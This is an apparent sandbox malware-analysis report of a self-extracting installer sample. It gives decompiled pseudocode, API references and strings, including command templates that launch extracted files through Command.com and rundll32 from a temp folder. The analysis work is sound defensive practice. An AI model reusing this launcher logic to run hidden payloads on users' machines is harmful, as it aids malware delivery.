											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x1069a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x1068a38 & 0x0000ffff;
											_v380 = 0x1069154;
											_v376 = _t151;
											_v372 = 0x10691e4;
											_v360 = _t97;
											if( *0x1068a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x1069a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x1068d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x1069a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x106a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x1069124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x1069a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x1068a20;
										if( *0x1068a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0106202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0106468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x1068c42;
									if( *0x1068c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x1068a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0106468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0106468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E01061781( &_v276, 0x104, _t130, 0x1068c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0106468F(_t130, 0x1069a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x01063baa
0x01063bb0
0x01063bb7
0x01063bc0
0x01063bc2
0x01063bc9
0x01063bcb
0x01063bcf
0x01063bd3
0x01063bd9
0x01063bfd
0x01063bfd
0x01063bff
0x01063c03
0x01063c03
0x01063c11
0x01063c16
0x01063c19
0x01063c28
0x00000000
0x00000000
0x01063c30
0x01063c39
0x01063c40
0x01063d13
0x01063d15
0x01063d21
0x01063d26
0x00000000
0x01063c4f
0x01063c56
0x01063c60
0x01063c65
0x01063c77
0x01063c78
0x01063c7c
0x01063c7e
0x01063c82
0x01063c82
0x00000000
0x01063c7c
0x01063c67
0x01063c69
0x01063c6d
0x00000000
0x01063c58
0x01063c58
0x01063c6e
0x01063c6e
0x01063c87
0x01063c89
0x01063d4d
0x01063d4f
0x01063d50
0x01063d52
0x01063d9e
0x01063da8
0x01063daf
0x01063db4
0x01063db6
0x01063f4d
0x01063f4d
0x01063f4f
0x01063f56
0x01063f57
0x01063f58
0x01063f63
0x01063f63
0x01063dbc
0x01063dc0
0x01063dc2
0x01063de6
0x01063de6
0x01063de8
0x01063f0b
0x01063f0b
0x01063f0f
0x01063f13
0x01063f15
0x01063f1a
0x01063f1c
0x01063f46
0x01063f47
0x00000000
0x01063f47
0x01063f1e
0x01063f1f
0x01063f25
0x01063f26
0x01063f2a
0x01063f2d
0x01063fd9
0x01063fd9
0x01063fda
0x01063fda
0x01063fe1
0x01063fe3
0x01063fe3
0x01063fe8
0x00000000
0x01063fe8
0x01063f33
0x01063f37
0x00000000
0x01063f37
0x01063dee
0x01063dee
0x01063df5
0x01063fad
0x01063fb9
0x01063fc2
0x01063fc8
0x00000000
0x01063fc8
0x01063dfb
0x01063dfd
0x00000000
0x00000000
0x01063e03
0x01063e0a
0x00000000
0x00000000
0x01063e15
0x01063e17
0x01063e19
0x01063f94
0x01063fa4
0x01063f7c
0x01063f80
0x01063f8b
0x00000000
0x01063f8b
0x01063e2c
0x01063e30
0x01063e34
0x01063e36
0x01063f69
0x01063f6e
0x01063f70
0x01063f76
0x00000000
0x01063f76
0x01063e3c
0x01063e43
0x01063e47
0x01063e52
0x01063e56
0x01063e5c
0x01063e61
0x01063e68
0x01063e70
0x01063e74
0x01063e7c
0x01063e80
0x01063e82
0x01063e82
0x01063e87
0x01063e87
0x01063e8b
0x01063e91
0x01063e94
0x01063e96
0x01063e96
0x01063e9b
0x01063e9b
0x01063e9f
0x01063ea2
0x01063ea4
0x01063ea4
0x01063ea9
0x01063ea9
0x01063ead
0x01063eb3
0x01063eb6
0x01063eb8
0x01063eb8
0x01063ebd
0x01063ebd
0x01063ec1
0x01063ec3
0x01063ec5
0x01063ec5
0x01063eca
0x01063eca
0x01063ece
0x01063ed5
0x01063ed9
0x01063ee0
0x01063ee6
0x01063eea
0x01063eec
0x01063eee
0x01063ef3
0x01063ef3
0x01063ef5
0x01063efa
0x01063efb
0x01063efd
0x01063f40
0x00000000
0x01063eff
0x01063eff
0x01063f05
0x00000000
0x01063f05
0x01063efd
0x01063dc7
0x01063dce
0x00000000
0x00000000
0x01063dd0
0x01063dd7
0x00000000
0x00000000
0x01063dd9
0x01063ddb
0x00000000
0x00000000
0x01063ddd
0x01063de1
0x00000000
0x01063de1
0x01063d59
0x01063d65
0x01063d6a
0x01063d6c
0x00000000
0x00000000
0x01063d6e
0x01063d75
0x00000000
0x00000000
0x01063d8f
0x01063d96
0x01063d98
0x00000000
0x00000000
0x00000000
0x01063d98
0x01063c8f
0x01063c98
0x01063cf1
0x01063cf3
0x00000000
0x00000000
0x01063cfe
0x01063d11
0x00000000
0x00000000
0x00000000
0x01063d11
0x01063c9c
0x01063ca5
0x01063ca7
0x00000000
0x00000000
0x01063cad
0x01063cb2
0x01063cb7
0x01063cc5
0x00000000
0x00000000
0x01063ce8
0x01063cec
0x01063ced
0x01063ced
0x00000000
0x01063ce8
0x01063c9e
0x00000000
0x01063c9e
0x01063c56
0x01063d35
0x01063d35
0x01063d3c
0x01063d48
0x00000000
0x01063d48
0x01063c03
0x01063be2
0x01063be7
0x01063bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 01063C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 01063CDC

Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,01068C42), ref: 01063D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 01063E26
FreeLibrary.KERNEL32(00000000,?,01068C42), ref: 01063EFF
LocalFree.KERNEL32(?,?,?,?,01068C42), ref: 01063F1F
FreeLibrary.KERNEL32(00000000,?,01068C42), ref: 01063F40
LocalFree.KERNEL32(?,?,?,?,01068C42), ref: 01063F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,01068C42), ref: 01063F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,01068C42), ref: 01063F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,01068C42), ref: 01063FC2

Strings

USRQCMD, xrefs: 01063CAD
SHOWWINDOW, xrefs: 01063C34
<None>, xrefs: 01063CC9, 01063D7D
DoInfInstall, xrefs: 01063E1F, 01063E24, 01063F68
REBOOT, xrefs: 01063BE2
RUNPROGRAM, xrefs: 01063D05
ADMQCMD, xrefs: 01063C9E
advpack.dll, xrefs: 01063F9D
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01063E74
POSTRUNPROGRAM, xrefs: 01063D60
D, xrefs: 01063C19
lega, xrefs: 01063E68

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lega
API String ID: 1032054927-3529754943
Opcode ID: 3a2e4f5bc7bb6d6feca019046d3a27cf6aa7eb2b3faf9100994836e9bf755b35
Instruction ID: 8ebfb37837e59c381b9e7f326b8f019cc84b9ea67c5d8d5b6b6dde4777804336
Opcode Fuzzy Hash: 3a2e4f5bc7bb6d6feca019046d3a27cf6aa7eb2b3faf9100994836e9bf755b35
Instruction Fuzzy Hash: BAB1CF70604301DFE770AF289845B6B7AECFB94714F10492EFAC9DA195DB7A8844CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 01061AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E01061AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x1068004; // 0x19e58fb5
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E01061680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E01061A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E01061781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
					E0106658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E01061680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E010666C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E010666C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E01061680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E01061781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E010616B3( &_v1552, 0x400, " ");
										E010616B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E01062AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0106171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E01061A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E01061A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E010644B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x1069120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x1061140, _t156, 8,  &_v268) == 0) {
										 *0x1069a34 =  *0x1069a34 & 0xfffffffb;
										if( *0x1069a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0106171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x1069a34 =  *0x1069a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E01061680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E01061680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E01066CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x01061af3
0x01061afa
0x01061b07
0x01061b09
0x01061b1a
0x01061b20
0x01061b2c
0x01061b3b
0x01061b40
0x01061b2e
0x01061b2e
0x01061b33
0x01061b33
0x01061b46
0x01061b4c
0x01061b52
0x01061b57
0x01061b5d
0x01061b61
0x01061b9f
0x01061b9f
0x01061bb1
0x01061bc2
0x00000000
0x01061b63
0x01061b63
0x01061b65
0x01061b68
0x01061b68
0x01061b6a
0x01061b6b
0x01061b6f
0x01061b74
0x00000000
0x00000000
0x01061b76
0x01061b7b
0x01061b86
0x00000000
0x00000000
0x00000000
0x00000000
0x01061b8c
0x01061b8c
0x01061b98
0x01061bc7
0x01061bc9
0x01061bcc
0x01061bd3
0x01061d75
0x01061d76
0x01061d78
0x01061d7f
0x01061e05
0x01061e09
0x00000000
0x00000000
0x01061e12
0x01061e1b
0x01061e73
0x01061e21
0x01061e21
0x01061e28
0x01061e37
0x01061e3e
0x01061e52
0x01061e60
0x01061e60
0x01061e3e
0x01061e79
0x01061e7b
0x01061e84
0x00000000
0x01061d9b
0x01061d9b
0x01061da0
0x01061da2
0x01061da5
0x01061da5
0x01061da7
0x01061da8
0x01061dac
0x01061dae
0x01061db4
0x01061db7
0x01061db7
0x01061db9
0x01061dba
0x01061dbe
0x01061dc3
0x01061dce
0x01061dd2
0x01061deb
0x00000000
0x01061df0
0x00000000
0x01061dd2
0x01061bf7
0x01061bfe
0x01061c07
0x01061d55
0x01061d5a
0x01061d5b
0x01061d5d
0x01061d5e
0x00000000
0x01061c1b
0x01061c1b
0x01061c20
0x01061c2c
0x01061c33
0x01061c38
0x01061c3a
0x01061c3a
0x01061c40
0x01061c4b
0x01061c4b
0x01061c5d
0x01061c61
0x01061dd4
0x01061dd4
0x01061dd6
0x01061ddb
0x01061ddc
0x01061dde
0x01061d64
0x01061d64
0x01061d67
0x01061d6c
0x00000000
0x01061c67
0x01061c67
0x01061c6d
0x01061c72
0x01061c74
0x01061c74
0x01061c8e
0x01061c99
0x01061cc0
0x01061cf8
0x01061d07
0x01061d23
0x01061d09
0x01061d14
0x01061d1b
0x01061d1b
0x01061d2b
0x01061d2d
0x01061d2d
0x01061d38
0x01061d39
0x01061d46
0x01061cc2
0x01061cc2
0x01061ccc
0x01061cce
0x01061cce
0x01061cdb
0x01061ce6
0x01061cee
0x01061cee
0x01061e89
0x01061e91
0x01061e92
0x01061e94
0x01061e97
0x01061ea4
0x01061ea4
0x01061c61
0x01061c07
0x01061bd3
0x01061b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01061BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01061BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01061C57
GetPrivateProfileIntA.KERNEL32 ref: 01061C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,01061140,00000000,00000008,?), ref: 01061CB8
GetShortPathNameA.KERNEL32 ref: 01061D1B

Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554

Strings

AdvancedINF, xrefs: 01061CAE
setupapi.dll, xrefs: 01061D23, 01061D3A
Version, xrefs: 01061CB3
.INF, xrefs: 01061BDB
DefaultInstall, xrefs: 01061C74, 01061C87, 01061CCE, 01061CD3, 01061D2D, 01061D39
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01061BA0
", xrefs: 01061B25
setupx.dll, xrefs: 01061D14
Command.com /c %s, xrefs: 01061D9B, 01061DE8
Reboot, xrefs: 01061C82
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 01061D3B
.BAT, xrefs: 01061D83

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-2869639027
Opcode ID: 59dde3658436be461f6b2eb4ac01a485784d5a24b36a18ff38ac8c45cf6824b3
Instruction ID: f520792ccbca8ad56b6e21f3ae429c9f04be921ff155f1b285182c68272629f5
Opcode Fuzzy Hash: 59dde3658436be461f6b2eb4ac01a485784d5a24b36a18ff38ac8c45cf6824b3
Instruction Fuzzy Hash: 65A14B70A00219ABEB70EB28CC44BEA77ADAFD5310F1442D9E5D5E72C0DBB59E85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01062F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E01062F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x1068004; // 0x19e58fb5
				_v8 = _t9 ^ _t46;
				if( *0x1068a38 != 0) {
					L5:
					_t11 = E01065164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E01066CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E010655A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0106658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x106a288("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x1068a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x1068a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x1068d48 & 0x000000c0;
									if(( *0x1068d48 & 0x000000c0) == 0) {
										_t41 =  *0x1069a40; // 0x3, executed
										_t26 = E0106256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x1068a24; // 0x0
									 *0x1069a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x1068a38;
										if( *0x1068a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E01064169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x1069a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E01063BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x1068a24; // 0x0
										goto L26;
									}
								}
								_t27 = E01063B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E010644B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x1069124 = E01066285();
							goto L16;
						}
						_t59 =  *0x1069a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0106621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x1068a24;
				if( *0x1068a24 != 0) {
					L4:
					_t34 = E01063A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E010651E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x1068a38;
				if( *0x1068a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x01062f1d
0x01062f28
0x01062f2f
0x01062f3d
0x01062f6c
0x01062f6c
0x01062f71
0x01062f73
0x01063041
0x01063041
0x01063043
0x01063053
0x01063053
0x01062f79
0x01062f80
0x00000000
0x01062f86
0x01062f86
0x01062f93
0x01062f9e
0x01062fa0
0x01062fa6
0x01062fb8
0x01062fba
0x01062fbe
0x01062fc6
0x01062fcc
0x01062fd4
0x01062fd6
0x01062fd8
0x01062fe0
0x01062fe6
0x01062fee
0x01062ff0
0x01062ff5
0x01062ff5
0x01062fee
0x01062fd4
0x01062ff8
0x01062ffe
0x01063004
0x01063017
0x0106301c
0x01063024
0x01063054
0x0106305a
0x01063065
0x01063065
0x0106306c
0x0106306e
0x01063075
0x0106307a
0x0106307a
0x0106307c
0x01063081
0x01063087
0x01063089
0x010630a1
0x010630a1
0x010630a9
0x010630ab
0x010630ad
0x010630af
0x010630af
0x010630ad
0x010630b6
0x00000000
0x0106308b
0x0106308b
0x01063091
0x00000000
0x00000000
0x01063093
0x01063098
0x0106309a
0x00000000
0x00000000
0x0106309c
0x00000000
0x0106309c
0x01063089
0x0106305c
0x01063061
0x01063063
0x00000000
0x00000000
0x00000000
0x01063063
0x0106302b
0x01063032
0x0106303c
0x00000000
0x0106303c
0x01063006
0x0106300c
0x00000000
0x00000000
0x0106300e
0x01063015
0x00000000
0x00000000
0x00000000
0x01063015
0x01062f80
0x01062f3f
0x01062f46
0x01062f5f
0x01062f5f
0x01062f64
0x01062f66
0x00000000
0x00000000
0x00000000
0x01062f66
0x01062f4f
0x00000000
0x00000000
0x01062f55
0x01062f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 01062F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 01062FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01062FC6
DecryptFileA.ADVAPI32 ref: 01062FE6
FreeLibrary.KERNEL32(00000000), ref: 01062FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0106301C

Part of subcall function 010651E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01062F4D,?,00000002,00000000), ref: 01065201

Strings

DecryptFileA, xrefs: 01062FC0
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01062FDB, 01063017
advapi32.dll, xrefs: 01062F99

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-1274120739
